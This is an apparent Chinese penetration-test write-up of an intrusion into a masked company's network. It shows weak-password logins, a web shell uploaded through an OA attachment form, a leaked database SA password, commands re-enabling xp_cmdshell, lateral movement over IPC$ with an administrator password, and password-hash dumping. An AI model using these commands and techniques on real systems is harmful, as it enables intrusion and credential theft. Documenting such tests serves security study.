目标信息收集:
www.SecPulse.com [aa.bb.cc.138] 主站
gonghui.SecPulse.com [aa.bb.cc.146] 工会网站
iwf.SecPulse.com [aa.bb.cc.144] OA系统
mail.SecPulse.com [aa.bb.cc.132] 邮件系统
meet.SecPulse.com [aa.bb.cc.135] 会议系统
uatmcms.SecPulse.com [aa.bb.cc.139] 会员合规管理系统
tradeweb1.SecPulse.com [aa.bb.dd.5] 交易系统
jy.SecPulse.com [aa.bb.dd.7] 交易管理系统
kpi.SecPulse.com [ee.ff.gg.137] 总裁决策信息平台
www.cms-SecPulse.com [ee.ff.gg.145] 网上开户系统
update.SecPulse.com [ee.ff.gg.141] 软件更新系统
https://ee.ff.gg.143 会员业务支撑系统
注:为保证隐私 域名全部换成了SecPulse

目录索引:
- 弱口令开篇
- WEB沦陷
- 内网渗透
- 总结与建议
一、弱口令开篇
1、邮件系统: https://mail.SecPulse.com/
谷歌加the harvester收集到一些邮箱 尝试弱口令猜解
c**r / 11111111
k***u / 11111111
xx***ngbu / 11111111

c**r / 12345678

admin / admin

POLYCOM / POLYCOM

二、WEB沦陷
我做测试的第一件事就是分析网络结构 找连接内网的段 根据ip分部情况,大概确定内网所在段。然后找某某目标开始入手 很荣幸其中员工oa系统就是属于内外网 https://iwf.SecPulse.com/iWorkflowPortal/ 弱口令成功登录c*ir@secpulse.com / 12345678
https://iwf.SecPulse.com/iworkflowportal/HRreq/HRAflReq.aspx?ProcessGroupID=170&ProcessID=8&ProjectID=84&DepartmentID=6
员工请假申请处,用户可上传附件


HTTP登录验证
SHELL地址这样填 http://user:pass@maicaidao.com/server.asp
用户名密码中的特殊字符可用URL编码转换。
此服务器在内网,鲜明的P496让我不禁联想到响亮的94P7




内网渗透:
查看OA系统配置文件,找到连接内网数据库SA密码:
<name=”CapCenterDB”connectionString=”server=10.**.0.**0;DataSource=10.**.0.**0;InitialCatalog=CapitaWorkflowCenter;User ID=sa;Password=123456;>
过程中遇到一个网闸系统 很多目标IP访问都有IP限制的 后来在OA数据库里面找到对应的SourceIP和DestIP以及允许的安全访问的端口。
读取OA数据库中防火墙配置相关信息:

EXEC sp_configure ‘show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;
MSSQL2008恢复xp_cmdshell存储过程成功,执行系统命令,显示为network权限。
这台数据库同样在域里

EXEC master..xp_cmdshell ‘net use //10.**.1.100/ipc$ “Password01!” /user:”P496/Administrator”‘







C:/windows/tasks/win2.exe w2.exe -l >C:/windows/tasks/hash.txt
使用计划任务执行批处理1.bat




s**cf / Password01!
各种Oracle配置密码

